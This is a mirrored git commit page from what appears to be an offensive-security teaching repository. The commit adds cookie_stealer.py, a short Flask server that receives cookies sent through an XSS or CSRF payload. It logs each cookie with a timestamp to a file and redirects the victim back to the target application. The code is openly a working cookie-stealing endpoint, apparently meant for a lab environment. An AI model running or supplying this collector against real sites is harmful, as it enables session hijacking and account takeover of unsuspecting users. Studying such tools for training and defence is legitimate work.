mirror of
https://github.com/The-Art-of-Hacking/h4cker.git
synced 2025-10-30 22:18:57 -04:00
Create cookie_stealer.py
This commit is contained in:
Omar Santos
parent
5656ac46fc
commit
923c66f672
1 changed files with 31 additions and 0 deletions
31
python_ruby_and_bash/cookie_stealer.py
Normal file
31
python_ruby_and_bash/cookie_stealer.py
Normal file
|
|
@ -0,0 +1,31 @@
|
||||||
|
#!/usr/bin/env python3
|
||||||
|
# This is a fairly basic Flask app / script to steal cookies
|
||||||
|
# It can be used as a cookie-stealer for XSS and CSRF attacks
|
||||||
|
# This is available by default in WebSploit Labs (websploit.org)
|
||||||
|
# Make sure that you have flask, requests, and redirect installed
|
||||||
|
# pip3 install flask, requests, redirect
|
||||||
|
|
||||||
|
from flask import Flask, request, redirect
|
||||||
|
from datetime import datetime
|
||||||
|
|
||||||
|
# Creating the instance for the Flask app
|
||||||
|
app = Flask(__name__)
|
||||||
|
|
||||||
|
#The following is the root directory of our web app
|
||||||
|
@app.route('/')
|
||||||
|
|
||||||
|
#Let's now create a function to steal the cookie and write it to a file "cookies.txt"
|
||||||
|
def cookie():
|
||||||
|
|
||||||
|
cookie = request.args.get('c')
|
||||||
|
f = open("cookies.txt","a")
|
||||||
|
f.write(cookie + ' ' + str(datetime.now()) + '\n')
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
# redirecting the user back to the vulnerable application
|
||||||
|
# change the URL to whatever application you are leveraging
|
||||||
|
return redirect("http://127.0.0.1:8883")
|
||||||
|
|
||||||
|
# you can change the port below to whatever you want to listen it
|
||||||
|
if __name__ == "__main__":
|
||||||
|
app.run(host = '0.0.0.0', port=1337)
|
||||||
Loading…
Add table
Add a link
Reference in a new issue